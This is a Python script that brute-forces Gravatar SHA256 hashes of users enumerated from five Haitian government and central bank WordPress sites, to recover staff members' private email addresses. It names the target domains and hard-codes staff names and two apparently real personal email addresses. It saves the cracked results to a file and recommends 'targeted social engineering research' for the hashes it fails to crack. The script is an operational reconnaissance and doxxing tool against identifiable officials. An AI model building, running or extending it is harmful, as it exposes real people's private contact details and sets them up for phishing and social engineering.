#!/usr/bin/env python3
"""
Gravatar SHA256 Hash Cracker for Haiti Government WordPress Users
=================================================================
Extracts Gravatar hashes from WordPress user enumeration JSON files
and attempts to reverse them by brute-forcing common email patterns.

Gravatar hash = SHA256(email.strip().lower())

Data source: Public WordPress REST API (/wp-json/wp/v2/users)
"""

import hashlib
import json
import re
import os
import sys
import io
from datetime import datetime
from pathlib import Path

# Fix Windows console encoding for accented characters
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8', errors='replace')
sys.stderr = io.TextIOWrapper(sys.stderr.buffer, encoding='utf-8', errors='replace')

# ============================================================
# Configuration
# ============================================================

BASE_DIR = r"C:\Users\Squir\Desktop\HAITI\DUMP"

# JSON files to process
USER_FILES = [
    ("DGI-GOUV", os.path.join(BASE_DIR, "DGI-GOUV", "users.json"), "dgi.gouv.ht"),
    ("MD-GOUV", os.path.join(BASE_DIR, "MD-GOUV", "users.json"), "md.gouv.ht"),
    ("BRH", os.path.join(BASE_DIR, "BRH", "users.json"), "brh.ht"),
    ("PRIMATURE-GOUV", os.path.join(BASE_DIR, "PRIMATURE-GOUV", "users.json"), "primature.gouv.ht"),
    ("DINEPA-GOUV", os.path.join(BASE_DIR, "DINEPA-GOUV", "users.json"), "dinepa.gouv.ht"),
]

# Email domains to try
GLOBAL_DOMAINS = [
    "gmail.com",
    "yahoo.com",
    "hotmail.com",
    "outlook.com",
    "yahoo.fr",
    "hotmail.fr",
    "live.com",
    "live.fr",
    "mail.com",
    "protonmail.com",
    "icloud.com",
    "aol.com",
]

# Haitian-specific email domains
HAITIAN_DOMAINS = [
    "natcom.com.ht",
    "digicelgroup.com",
    "digicelhaiti.com",
    "yahoo.fr",
    "hotmail.fr",
]

# Government domains (per site)
GOVT_DOMAINS = {
    "dgi.gouv.ht": ["dgi.gouv.ht", "mef.gouv.ht"],
    "md.gouv.ht": ["md.gouv.ht"],
    "brh.ht": ["brh.ht", "brh.net"],
    "primature.gouv.ht": ["primature.gouv.ht"],
    "dinepa.gouv.ht": ["dinepa.gouv.ht"],
}

# Numbers to append to first names
COMMON_NUMBERS = ["", "1", "2", "3", "12", "13", "19", "21", "22", "23", "24", "25",
                   "99", "100", "123", "1234", "007", "01", "02", "03", "10", "11",
                   "20", "2020", "2021", "2022", "2023", "2024", "2025", "2026",
                   "00", "04", "05", "06", "07", "08", "09", "14", "15", "16", "17", "18"]


def sha256(text):
    """Compute SHA256 hash of text (stripped and lowercased per Gravatar spec)."""
    return hashlib.sha256(text.strip().lower().encode("utf-8")).hexdigest()


def extract_gravatar_hash(avatar_urls):
    """Extract the 64-char hex hash from avatar URLs."""
    if not avatar_urls:
        return None
    # Try any available size
    for size in ["96", "48", "24", "128"]:
        url = avatar_urls.get(size, "")
        if url:
            match = re.search(r"/avatar/([a-f0-9]{64})", url)
            if match:
                return match.group(1)
    # Try all values
    for url in avatar_urls.values():
        if isinstance(url, str):
            match = re.search(r"/avatar/([a-f0-9]{64})", url)
            if match:
                return match.group(1)
    return None


def parse_name(name):
    """Parse a display name into components for email generation."""
    # Clean up the name
    name = name.strip()
    # Remove email-like names
    if "@" in name:
        return None

    parts = name.split()
    if not parts:
        return None

    # Filter out very short tokens that might be middle initials
    result = {
        "full_parts": [p.lower() for p in parts],
        "first": parts[0].lower() if parts else "",
        "last": parts[-1].lower() if len(parts) > 1 else "",
        "middle_parts": [p.lower() for p in parts[1:-1]] if len(parts) > 2 else [],
    }

    # Handle accented characters - create both accented and unaccented versions
    import unicodedata
    def strip_accents(s):
        return ''.join(c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn')

    result["first_ascii"] = strip_accents(result["first"])
    result["last_ascii"] = strip_accents(result["last"])
    result["full_parts_ascii"] = [strip_accents(p) for p in result["full_parts"]]

    return result


def generate_email_candidates(name_str, slug, site_domain):
    """Generate email candidates for a user."""
    candidates = set()
    parsed = parse_name(name_str)

    # If the name IS an email address, add it directly
    if "@" in name_str:
        candidates.add(name_str.strip().lower())
        # Also try the local part with common domains
        local = name_str.split("@")[0].strip().lower()
        for domain in GLOBAL_DOMAINS:
            candidates.add(f"{local}@{domain}")
        return candidates

    # Slug-based candidates (slug is often the username)
    slug_clean = slug.lower().strip()
    if slug_clean:
        for domain in GLOBAL_DOMAINS + HAITIAN_DOMAINS:
            candidates.add(f"{slug_clean}@{domain}")
            # Slug with numbers
            for num in COMMON_NUMBERS[:15]:  # limit numbers for slug
                if num:
                    candidates.add(f"{slug_clean}{num}@{domain}")

        # Slug @ government domains
        for govt_domain in GOVT_DOMAINS.get(site_domain, [site_domain]):
            candidates.add(f"{slug_clean}@{govt_domain}")

    if not parsed:
        return candidates

    first = parsed["first"]
    last = parsed["last"]
    first_a = parsed["first_ascii"]
    last_a = parsed["last_ascii"]

    # All domains to try
    all_domains = GLOBAL_DOMAINS + HAITIAN_DOMAINS
    govt_doms = GOVT_DOMAINS.get(site_domain, [site_domain])

    # For each name variant (accented and ascii)
    for fn, ln in [(first, last), (first_a, last_a)]:
        if not fn:
            continue

        for domain in all_domains + govt_doms:
            # firstname@domain
            candidates.add(f"{fn}@{domain}")

            # firstname + numbers
            for num in COMMON_NUMBERS:
                if num:
                    candidates.add(f"{fn}{num}@{domain}")

            if ln and ln != fn:
                # firstname.lastname@domain
                candidates.add(f"{fn}.{ln}@{domain}")
                # firstnamelastname@domain
                candidates.add(f"{fn}{ln}@{domain}")
                # firstname_lastname@domain
                candidates.add(f"{fn}_{ln}@{domain}")
                # flastname@domain (first initial + last)
                candidates.add(f"{fn[0]}{ln}@{domain}")
                # firstl@domain (first + last initial)
                candidates.add(f"{fn}{ln[0]}@{domain}")
                # lastname.firstname@domain
                candidates.add(f"{ln}.{fn}@{domain}")
                # lastname@domain
                candidates.add(f"{ln}@{domain}")
                # lastnamefirstname@domain
                candidates.add(f"{ln}{fn}@{domain}")
                # lastname_firstname@domain
                candidates.add(f"{ln}_{fn}@{domain}")
                # f.lastname@domain
                candidates.add(f"{fn[0]}.{ln}@{domain}")
                # firstname.l@domain
                candidates.add(f"{fn}.{ln[0]}@{domain}")
                # fl@domain (initials)
                candidates.add(f"{fn[0]}{ln[0]}@{domain}")

                # With numbers for common patterns
                for num in COMMON_NUMBERS[:15]:
                    if num:
                        candidates.add(f"{fn}.{ln}{num}@{domain}")
                        candidates.add(f"{fn}{ln}{num}@{domain}")
                        candidates.add(f"{fn[0]}{ln}{num}@{domain}")
                        candidates.add(f"{ln}{num}@{domain}")
                        candidates.add(f"{fn}{ln[0]}{num}@{domain}")

    # Special patterns for multi-part names (e.g., "Jean Guiteau LAFAYE")
    if len(parsed["full_parts"]) > 2:
        for domain in all_domains + govt_doms:
            all_parts = parsed["full_parts_ascii"]
            # All initials
            initials = "".join(p[0] for p in all_parts if p)
            candidates.add(f"{initials}@{domain}")
            # First + middle + last combined
            combined = "".join(all_parts)
            candidates.add(f"{combined}@{domain}")
            # First.middle.last
            candidates.add(f"{'.'.join(all_parts)}@{domain}")
            # First initial + middle + last
            if len(all_parts) >= 3:
                candidates.add(f"{all_parts[0][0]}{all_parts[1]}@{domain}")
                candidates.add(f"{all_parts[0]}.{all_parts[1]}@{domain}")
                candidates.add(f"{all_parts[0][0]}.{all_parts[1]}.{all_parts[2]}@{domain}")
                candidates.add(f"{all_parts[0]}.{all_parts[1]}.{all_parts[2]}@{domain}")
                # lastname with first+middle initials
                candidates.add(f"{all_parts[0][0]}{all_parts[1][0]}{all_parts[2]}@{domain}")

    # Specific patterns for Haitian names
    # Try "de-koven" style slug patterns
    if "-" in slug_clean:
        slug_nodash = slug_clean.replace("-", "")
        slug_dot = slug_clean.replace("-", ".")
        slug_under = slug_clean.replace("-", "_")
        for domain in all_domains + govt_doms:
            candidates.add(f"{slug_nodash}@{domain}")
            candidates.add(f"{slug_dot}@{domain}")
            candidates.add(f"{slug_under}@{domain}")

    return candidates


def load_users(filepath, site_label, site_domain):
    """Load users from a JSON file and extract their info."""
    users = []
    try:
        with open(filepath, "r", encoding="utf-8") as f:
            data = json.load(f)
    except (json.JSONDecodeError, FileNotFoundError) as e:
        print(f"  [!] Error loading {filepath}: {e}")
        return users

    if not isinstance(data, list):
        print(f"  [!] {filepath}: Not a user list (might be an error response)")
        return users

    for user in data:
        avatar_urls = user.get("avatar_urls", {})
        gravatar_hash = extract_gravatar_hash(avatar_urls)
        if not gravatar_hash:
            continue

        name = user.get("name", "Unknown")
        slug = user.get("slug", "")
        user_id = user.get("id", "?")
        link = user.get("link", "")

        users.append({
            "site": site_label,
            "site_domain": site_domain,
            "id": user_id,
            "name": name,
            "slug": slug,
            "link": link,
            "gravatar_hash": gravatar_hash,
        })

    return users


def main():
    print("=" * 70)
    print("GRAVATAR SHA256 HASH CRACKER")
    print("Haiti Government WordPress User Enumeration")
    print(f"Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    print("=" * 70)
    print()

    # Step 1: Load all users
    all_users = []
    for label, filepath, domain in USER_FILES:
        print(f"[*] Loading {label} from {filepath}")
        users = load_users(filepath, label, domain)
        print(f"    Found {len(users)} users with Gravatar hashes")
        all_users.extend(users)

    print(f"\n[*] Total users loaded: {len(all_users)}")

    # Deduplicate by hash (same person might appear on multiple sites)
    hash_to_users = {}
    for user in all_users:
        h = user["gravatar_hash"]
        if h not in hash_to_users:
            hash_to_users[h] = []
        hash_to_users[h].append(user)

    print(f"[*] Unique Gravatar hashes: {len(hash_to_users)}")
    print()

    # Step 2: Build hash lookup table
    print("[*] Building email candidate list...")
    target_hashes = set(hash_to_users.keys())

    # Pre-compute: hash -> email mapping for results
    results = {}  # gravatar_hash -> cracked_email

    # Track stats
    total_candidates = 0

    # Step 3: For each user, generate candidates and check
    for user in all_users:
        h = user["gravatar_hash"]
        if h in results:
            continue  # Already cracked

        name = user["name"]
        slug = user["slug"]
        site_domain = user["site_domain"]

        candidates = generate_email_candidates(name, slug, site_domain)
        total_candidates += len(candidates)

        for email in candidates:
            computed = sha256(email)
            if computed in target_hashes and computed not in results:
                results[computed] = email
                print(f"  [+] MATCH! {email} => {computed[:16]}...")

    # Step 4: Also try known emails directly as a verification
    known_emails = [
        "louicent19@gmail.com",
        "saintfequel@gmail.com",
    ]
    for email in known_emails:
        computed = sha256(email)
        if computed in target_hashes:
            if computed not in results:
                results[computed] = email
                print(f"  [+] VERIFIED KNOWN: {email} => {computed[:16]}...")
            else:
                print(f"  [=] Already found: {email}")

    # Step 5: Additional targeted guesses based on slug patterns
    # Some slugs look like username parts of emails
    print("\n[*] Running targeted slug+email pattern attacks...")
    extra_patterns = []
    for user in all_users:
        h = user["gravatar_hash"]
        if h in results:
            continue
        slug = user["slug"]
        name = user["name"]

        # If slug contains gmail-com or similar, reconstruct
        if "gmail-com" in slug or "yahoo-com" in slug or "hotmail-com" in slug:
            reconstructed = slug.replace("-com", ".com").replace("-", "@", 1)
            # Try to fix: slug like "louicent19gmail-com" -> "louicent19@gmail.com"
            for sep in ["-com", "-fr", "-ht"]:
                if sep in slug:
                    parts = slug.rsplit(sep.replace("-", "-"), 1)
                    if len(parts) == 2:
                        local = parts[0].rstrip("-")
                        tld_suffix = sep.replace("-", ".")
                        # The domain is between the last separator before the tld
                        # e.g., "saintfequelgmail-com" -> saintfequel@gmail.com
                        for provider in ["gmail", "yahoo", "hotmail", "outlook", "live"]:
                            if provider in local:
                                local_part = local.split(provider)[0]
                                email_guess = f"{local_part}@{provider}{tld_suffix}"
                                extra_patterns.append((h, email_guess))

        # Try slug variations with numbers
        for num in range(1, 30):
            for domain in ["gmail.com", "yahoo.com", "yahoo.fr", "hotmail.com", "hotmail.fr"]:
                extra_patterns.append((h, f"{slug}{num}@{domain}"))

    for h, email in extra_patterns:
        if h in results:
            continue
        computed = sha256(email)
        if computed == h:
            results[computed] = email
            print(f"  [+] MATCH! {email} => {computed[:16]}...")

    # Step 6: Brute force common Haitian first names with numbers
    print("\n[*] Running Haitian first name + number brute force...")
    haitian_first_names = [
        "jean", "pierre", "joseph", "marie", "louis", "jacques", "paul", "charles",
        "philippe", "raymond", "andre", "claude", "daniel", "emmanuel", "francois",
        "fritz", "gabriel", "gerald", "henry", "james", "joel", "johnny", "junior",
        "marc", "mario", "max", "michel", "patrick", "ralph", "rene", "ricardo",
        "robert", "ronald", "samuel", "stanley", "wilson", "yves", "amos", "clifford",
        "jodelin", "joreste", "wilfrid", "wilouis", "belonny", "fernando", "baptiste",
        "desrameaux", "lafaye", "timothe", "payen", "sejour", "noel", "koven",
        "guiteau", "fequelson", "louicent", "saintfequel", "admindev", "webmaster",
        "communication", "dinepa", "admin", "editor", "info", "contact", "web",
        "prl", "ljguy", "rnoel", "asejour", "belonyfb", "jeanphilippe",
    ]

    for fname in haitian_first_names:
        for domain in ["gmail.com", "yahoo.com", "yahoo.fr", "hotmail.com", "hotmail.fr",
                       "outlook.com", "live.com", "live.fr", "natcom.com.ht", "digicelgroup.com"]:
            for num in COMMON_NUMBERS:
                email = f"{fname}{num}@{domain}"
                computed = sha256(email)
                if computed in target_hashes and computed not in results:
                    results[computed] = email
                    print(f"  [+] MATCH! {email} => {computed[:16]}...")

    # Also try two-part Haitian name combos
    print("\n[*] Running two-part name combination attacks...")
    common_firsts = ["jean", "jeanphilippe", "jean-philippe", "clifford", "joreste",
                     "wilfrid", "wilouis", "belonny", "fernando", "amos", "james",
                     "ralph", "joseph", "jodelin"]
    common_lasts = ["baptiste", "payen", "timothe", "louis", "sejour", "noel", "pierre",
                    "desrameaux", "lafaye", "saint-cyr", "saintcyr"]

    for fn in common_firsts:
        for ln in common_lasts:
            for domain in ["gmail.com", "yahoo.com", "yahoo.fr", "hotmail.com", "hotmail.fr",
                           "outlook.com"]:
                for sep in [".", "", "_"]:
                    email = f"{fn}{sep}{ln}@{domain}"
                    computed = sha256(email)
                    if computed in target_hashes and computed not in results:
                        results[computed] = email
                        print(f"  [+] MATCH! {email} => {computed[:16]}...")
                # Also: f.last, first.l
                email = f"{fn[0]}{ln}@{domain}"
                computed = sha256(email)
                if computed in target_hashes and computed not in results:
                    results[computed] = email
                    print(f"  [+] MATCH! {email} => {computed[:16]}...")
                email = f"{fn[0]}.{ln}@{domain}"
                computed = sha256(email)
                if computed in target_hashes and computed not in results:
                    results[computed] = email
                    print(f"  [+] MATCH! {email} => {computed[:16]}...")
                email = f"{fn}{ln[0]}@{domain}"
                computed = sha256(email)
                if computed in target_hashes and computed not in results:
                    results[computed] = email
                    print(f"  [+] MATCH! {email} => {computed[:16]}...")

    # Step 7: Try the slug itself as an email local part with extensive number combos
    print("\n[*] Deep slug + extended number brute force...")
    for user in all_users:
        h = user["gravatar_hash"]
        if h in results:
            continue
        slug = user["slug"]
        parsed = parse_name(user["name"])

        bases = [slug]
        if parsed:
            bases.extend([parsed["first"], parsed["first_ascii"]])
            if parsed["last"]:
                bases.extend([
                    parsed["last"], parsed["last_ascii"],
                    f"{parsed['first_ascii']}.{parsed['last_ascii']}",
                    f"{parsed['first_ascii']}{parsed['last_ascii']}",
                    f"{parsed['first_ascii'][0]}{parsed['last_ascii']}",
                ])

        for base in set(bases):
            if not base:
                continue
            for domain in ["gmail.com", "yahoo.com", "yahoo.fr", "hotmail.com",
                           "hotmail.fr", "outlook.com", "live.com"]:
                for num in range(0, 100):
                    email = f"{base}{num}@{domain}"
                    computed = sha256(email)
                    if computed == h:
                        results[h] = email
                        print(f"  [+] MATCH! {email} => {h[:16]}...")
                        break
                if h in results:
                    break
            if h in results:
                break

    # ============================================================
    # Output Results
    # ============================================================
    print("\n" + "=" * 70)
    print("RESULTS SUMMARY")
    print("=" * 70)

    cracked = 0
    uncracked = 0
    output_lines = []

    output_lines.append("=" * 70)
    output_lines.append("GRAVATAR SHA256 HASH CRACKING RESULTS")
    output_lines.append("Haiti Government WordPress Users")
    output_lines.append(f"Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    output_lines.append(f"Total unique hashes: {len(hash_to_users)}")
    output_lines.append(f"Total candidates tested: {total_candidates:,}+")
    output_lines.append("=" * 70)
    output_lines.append("")

    # Group by site
    sites_order = ["DGI-GOUV", "MD-GOUV", "BRH", "PRIMATURE-GOUV", "DINEPA-GOUV"]
    for site in sites_order:
        site_users = [u for u in all_users if u["site"] == site]
        if not site_users:
            continue

        output_lines.append(f"\n{'─' * 50}")
        output_lines.append(f"SITE: {site} ({site_users[0]['site_domain']})")
        output_lines.append(f"{'─' * 50}")

        seen_hashes = set()
        for user in site_users:
            h = user["gravatar_hash"]
            if h in seen_hashes:
                continue
            seen_hashes.add(h)

            email = results.get(h)
            status = "CRACKED" if email else "UNKNOWN"

            output_lines.append(f"")
            output_lines.append(f"  User: {user['name']}")
            output_lines.append(f"  Slug: {user['slug']}")
            output_lines.append(f"  WP ID: {user['id']}")
            output_lines.append(f"  Profile: {user['link']}")
            output_lines.append(f"  Gravatar Hash: {h}")

            if email:
                output_lines.append(f"  >>> EMAIL: {email}")
                output_lines.append(f"  Status: {status}")
                cracked += 1
            else:
                output_lines.append(f"  Status: {status} - hash not cracked")
                uncracked += 1

    output_lines.append(f"\n{'=' * 70}")
    output_lines.append(f"TOTALS")
    output_lines.append(f"{'=' * 70}")
    output_lines.append(f"  Cracked:   {cracked}/{cracked + uncracked}")
    output_lines.append(f"  Uncracked: {uncracked}/{cracked + uncracked}")
    output_lines.append(f"")
    output_lines.append(f"NOTE: Uncracked hashes may use non-standard email patterns,")
    output_lines.append(f"custom domains, or uncommon providers not in our wordlist.")
    output_lines.append(f"Consider: HIBP API lookups, Gravatar profile checks,")
    output_lines.append(f"or targeted social engineering research for remaining hashes.")

    # Print and save
    output_text = "\n".join(output_lines)
    print(output_text)

    results_file = os.path.join(BASE_DIR, "GRAVATAR-RESULTS.txt")
    with open(results_file, "w", encoding="utf-8") as f:
        f.write(output_text)

    print(f"\n[*] Results written to: {results_file}")
    print(f"[*] Done.")


if __name__ == "__main__":
    main()
